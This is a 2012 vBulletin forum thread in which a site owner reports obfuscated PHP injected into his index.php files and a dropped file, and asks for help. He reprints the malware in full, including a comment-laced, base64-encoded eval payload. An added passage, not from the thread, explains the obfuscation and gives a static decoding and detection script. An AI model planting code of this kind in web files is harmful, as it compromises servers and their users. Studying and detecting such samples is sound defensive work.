HELP!!! - code injected into all my index.php files somehow

  • SloppyGoat
    Senior Member
    • Feb 2002
    • 674


    This has happened a few times now. Can someone tell me how this code keeps getting injected into my index.php files? It disables the forum. Seems easy enough to remove, but I've been hit with it like 3 times now, and I need to figure out why and how to stop this! Can anyone tell me where this is coming from and how to secure my server/forum?

    This was at the top of my main index.php file...and just about all other index.php files.

    PHP Code:
    <?php eval(gzinflate(base64_decode('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')));?>
    Last edited by SloppyGoat; Sat 24 Nov '12, 8:47am.
    The Grey Area - Tweaking Obsession
  • Lynne
    Former vBulletin Support
    • Oct 2004
    • 26255

    #2
    Have you and your host checked your access_logs and server logs to see exactly how they are going about doing this? Even if you fix it, if you don't know how they are doing it, they will just continue to do it over and over again.

    Please don't PM or VM me for support - I only help out in the threads.
    vBulletin Manual & vBulletin 4.0 Code Documentation (API)
    Want help modifying your vbulletin forum? Head on over to vbulletin.org
    If I post CSS and you don't know where it goes, throw it into the additional.css template.

    W3Schools <- awesome site for html/css help


    • SloppyGoat
      Senior Member
      • Feb 2002
      • 674

      #3
      Yep, and I'm seeing event logs like this, which aren't very helpful in any way. Most have little if any info. It's a bunch of 540 and 538 events. It's been over 13 years since I've had any serious problems, so I thought I was pretty secure, but now this. GRRRRRR!!!! What else can I check? It's an IIS server, BTW.

      Event Type: Success Audit
      Event Source: Security
      Event Category: Logon/Logoff
      Event ID: 540
      Date: 11/23/2012
      Time: 6:46:28 PM
      User: NT AUTHORITY\ANONYMOUS LOGON
      Computer: TGA
      Description:
      Successful Network Logon:
      User Name:
      Domain:
      Logon ID: (0x0,0x1494E)
      Logon Type: 3
      Logon Process: NtLmSsp
      Authentication Package: NTLM
      Workstation Name:
      Logon GUID: -
      Caller User Name: -
      Caller Domain: -
      Caller Logon ID: -
      Caller Process ID: -
      Transited Services: -
      Source Network Address: -
      Source Port: -
      The Grey Area - Tweaking Obsession


      • Lynne
        Former vBulletin Support
        • Oct 2004
        • 26255

        #4
        Nothing is showing in your access_logs or server logs? (What you posted is not the access_log or the server log.)

        edit: Whoops, just saw it is Windows.

        How about your control panel logs in the admincp? Is someone else logging in as an admin and doing anything? Is your host helping out with this?

        Please don't PM or VM me for support - I only help out in the threads.
        vBulletin Manual & vBulletin 4.0 Code Documentation (API)
        Want help modifying your vbulletin forum? Head on over to vbulletin.org
        If I post CSS and you don't know where it goes, throw it into the additional.css template.

        W3Schools <- awesome site for html/css help


        • SloppyGoat
          Senior Member
          • Feb 2002
          • 674

          #5
          It's my own server. I have no host. No unknown log ins on the forum. CP shows nothing unusual. It's like the forum hasn't been touched...just the index.php files only.
          The Grey Area - Tweaking Obsession


          • Lynne
            Former vBulletin Support
            • Oct 2004
            • 26255

            #6
            If files were touched, then somebody was able to login to the server and change them. So, you must have a log of that somewhere. (Or perhaps you aren't logging all server activity?)

            Please don't PM or VM me for support - I only help out in the threads.
            vBulletin Manual & vBulletin 4.0 Code Documentation (API)
            Want help modifying your vbulletin forum? Head on over to vbulletin.org
            If I post CSS and you don't know where it goes, throw it into the additional.css template.

            W3Schools <- awesome site for html/css help


            • beishe8
              Senior Member
              • Oct 2005
              • 6782
              • 4.2.X

              #7
              They could find their way through some of the vB modifications.
              or
              Some other scripts on your server.
              or
              Some virus on your computer(server)...


              vB5 is unequivocally the best forum software, but not yet...


              • SloppyGoat
                Senior Member
                • Feb 2002
                • 674

                #8
                Well, Win Server has the security event log, and it's full of empty anonymous logons, which I unfortunately have not been monitoring lately, since there have been no attacks for a long time now. Anything else I should look for on a Win 2003 Server? There is so much sh*t in the W3SVC1 log files that I have no idea what to even look for. It logs everything. There are tons of IPs and other info that doesn't seem helpful, but just more confusing. Want to see the W3 log files for those days? There's really just far too much info in there to make any sense to me.
                The Grey Area - Tweaking Obsession


                • beishe8
                  Senior Member
                  • Oct 2005
                  • 6782
                  • 4.2.X

                  #9
                  Sorry, I'm not familiar with Win servers at all, have no clue what could have happened there.


                  vB5 is unequivocally the best forum software, but not yet...


                  • betterthanyours
                    Senior Member
                    • May 2012
                    • 110

                    #10
                    You should post the logs and disable anonymous login.
                    http://www.unrealkillers.com | unrealtournament 1999 | siege | combogib | bunnytrack | instagib ctf


                    • SloppyGoat
                      Senior Member
                      • Feb 2002
                      • 674

                      #11
                      Anonymous login is disabled. Only IUSR (Inet guest account) and IWAM (Launch IIS process account) are enabled besides the ASP.net account. Other than that, only my renamed Admin account is enabled. I'm pretty damn sure that is the bare minimum for an IIS website?
                      The Grey Area - Tweaking Obsession


                      • SloppyGoat
                        Senior Member
                        • Feb 2002
                        • 674

                        #12
                        Can anyone decode this crap, or help me figure out how to defend from it?

                        Malicious code found in index.php files.

                        PHP Code:
                        <?php eval(gzinflate(base64_decode('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')));?>
                        Code found in some file named, "wjzkk.php".

                        PHP Code:
                        <?php /*@(7H*/eval/*M2c*/(/*i=yS*/base64_decode/*KAALX*/(/*mPp! g*/'Lyp7UEhjKi9ldmFsLypaTHpCbD0qLygvKjhnTSU1SSovYmFzZTY0X2RlY29kZS8qVHY6QiovKC8qeklTKi8nTHlvME5pQmV'/*q[R*/./*(P-*/'LaTlwWmk4cVduZ21UV0J3S2k4b0x5cGZmSDVnS2k5cGMzTmxkQzhxZGl4R1dpb3ZLQzhxYkY5VFJpb3ZKRjlTUlZGVlJWTl'/*;gs gl*/./*}5u@*/'VMeScvKl9BTW52Ki8uLypFVDJlcyovJ28rVDN3K0szbGpLaTliTHlwWU5Vc2hWeW92SjJFbkx5bzVNa3RPTFVZcUx5NHZLb'/*D{gM1i*/./*w>zO.*/'XhqWlVrcUx5ZHpKeThxWXpNMmJ5b3ZMaThxT3oxQVp5b3YnLyole2AmQSovLi8qUnZCWVIqLydKMk1uTHlweFdtaFNLaTlk'/*;&~IP*/./*0^@&F*/'THlwb1NUMUVLaTh2S2xNM0pUbFZWeW92S1M4cVhFbytieTBuS2k4dktsTWdlMUJSWkNvdktTOHFaVmN1WGx3cUwyJy8qcTQ'/*8lH?B5!NX*/./*+@_c1*/'2WTNNKi8uLyo4enUqLydWMllXd3ZLbFZGUDA4cUx5Z3ZLbFo5SmtoRUtpOXpkSEpwY0hOc1lYTm9aWE12S25kT1RHZERRRn'/*4Wb*/./*>R r-*/'NxTHlndktqb2xZQ0FxTHlSZlVrVlJWVVZUJy8qWn54LEVHUDE4Ki8uLypzQy4qLydWQzhxYkRkbUtpOWJMeW9uUG50VUpTd'/*e6gZ6J*/./*>(ACFZ*/'FlaQ292SjJFbkx5cElZREptV0ZKbktpOHVMeXBDZm4xNU9Db3ZKM05qSnk4cVkyNThLaTlkTHlvNWRFJy8qUXJJUWUqLy4v'/*D2[8*/./*6,a^*/'Kkk4b2MqLydvNFdTb3ZMeW95VEc4aEtpOHBMeXBrT0ZwMExTb3ZMeW82V3pwblhTb3ZLUzhxWFZ0ZVh5b3ZMeXBlWVZrZ1Z'/*GD-[Q{=*/./*I^_ */'pWXFMenN2S2o1TVJUUXFMdz09Jy8qSjZyKi8pLyohbStoLCovLypBN14mJlw6Ki8pLypnIWEqLy8qIFhgMCovOy8qTXhvdyov'/*ae,*/)/*8JW1*//*B'dm*/)/*>[jH*//*r(S`m*/;/*A7ml*/ ?>
                        The Grey Area - Tweaking Obsession


                        • Lynne
                          Former vBulletin Support
                          • Oct 2004
                          • 26255

                          #13
                          We wouldn't want it posted here if we did decode it. You can just google the eval part and get a decoder for it.

                          Please don't PM or VM me for support - I only help out in the threads.
                          vBulletin Manual & vBulletin 4.0 Code Documentation (API)
                          Want help modifying your vbulletin forum? Head on over to vbulletin.org
                          If I post CSS and you don't know where it goes, throw it into the additional.css template.

                          W3Schools <- awesome site for html/css help
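The two snippets in post #12 are the same trick in two dressings: eval() over a base64 string (optionally run through gzinflate() first), with the second one also laced with /* */ comments and the string split into '...'.'...' pieces so simple grep signatures miss it. Post #13 suggests decoding it rather than running it; the added example below (not from this thread or from vBulletin) does exactly that statically, never executing any PHP. It strips block comments, finds the eval(base64_decode(...)) / eval(gzinflate(base64_decode(...))) pattern, re-joins the quoted pieces, decodes, and repeats on the result because such payloads are often nested (the first layer of the wjzkk.php sample decodes to another comment-laced eval(base64_decode(...))). The sample it builds and unwraps is constructed here; the hypothetical inner payload is a harmless echo.

```python
import base64
import re
import zlib

# Constructed inner payload: a harmless stand-in for the real injected code.
INNER = b"<?php echo 'constructed inner layer'; ?>"

def _gzdeflate(data: bytes) -> bytes:
    """Raw DEFLATE stream, the inverse of PHP's gzinflate() (no zlib header)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()

def _split_quoted(b64: str, width: int = 24) -> str:
    """Break a base64 string into 'a'/*x*/./*y*/'b' pieces, as in wjzkk.php."""
    parts = [b64[i:i + width] for i in range(0, len(b64), width)]
    return "/*q[R*/./*(P-*/".join(f"'{p}'" for p in parts)

def build_sample() -> str:
    """Two constructed layers: a comment-laced eval(base64_decode(...)) wrapped
    in eval(gzinflate(base64_decode(...))), mirroring the thread's two snippets."""
    middle = ("<?php /*@(7H*/eval/*M2c*/(/*i=yS*/base64_decode/*K*/(/*m*/"
              + _split_quoted(base64.b64encode(INNER).decode())
              + "/*a*/)/*8J*/)/*r*/; ?>")
    outer = base64.b64encode(_gzdeflate(middle.encode())).decode()
    return f"<?php eval(gzinflate(base64_decode('{outer}')));?>"

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
EVAL_RE = re.compile(
    r"eval\s*\(\s*(gzinflate\s*\(\s*)?base64_decode\s*\(\s*"
    r"((?:'[^']*'\s*\.?\s*)+)\)", re.S)

def looks_injected(php_source: str) -> bool:
    """Cheap triage check for an index.php: is there an eval over a decoded string?"""
    return EVAL_RE.search(COMMENT_RE.sub("", php_source)) is not None

def unwrap_eval_layers(php_source: str, max_layers: int = 8) -> list[bytes]:
    """Statically peel eval(gzinflate(base64_decode(...))) / eval(base64_decode(...))
    layers without executing PHP. Returns each decoded layer, outermost first."""
    layers, current = [], php_source
    for _ in range(max_layers):
        m = EVAL_RE.search(COMMENT_RE.sub("", current))  # comments are noise
        if not m:
            break
        payload = "".join(re.findall(r"'([^']*)'", m.group(2)))  # re-join 'a'.'b'
        data = base64.b64decode(payload)
        if m.group(1):  # gzinflate() wrapper present: raw DEFLATE, no header
            data = zlib.decompress(data, -15)
        layers.append(data)
        current = data.decode("latin-1")  # try to peel the next layer
    return layers

if __name__ == "__main__":
    for i, layer in enumerate(unwrap_eval_layers(build_sample()), 1):
        print(f"layer {i}: {layer[:60]!r}")
```

Run looks_injected() over every index.php under the web root to find infected copies; the decoded layers show what the payload does, which is what you need before deciding what else on the server to check.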


                          • SloppyGoat
                            Senior Member
                            • Feb 2002
                            • 674

                            #14
                            I don't know enough about it to figure it out. I've already tried. As long as you remove php from the beginning, or you're not running a php server, then isn't it harmless anyway? It's not a virus. It's just some crappy code that I suspect reroutes my server to spam someone else with their BS. But without some help, I don't guess I'll ever know.
                            The Grey Area - Tweaking Obsession


                            • borbole
                              Senior Member
                              • Feb 2010
                              • 3074
                              • 4.0.0

                              #15
                              You might want to hire an expert to look into this then.

                              I don't know if this type of thing is included in the vb support, but you can start a ticket at your client center here and see if one of the vb staff can take a look into this for you.
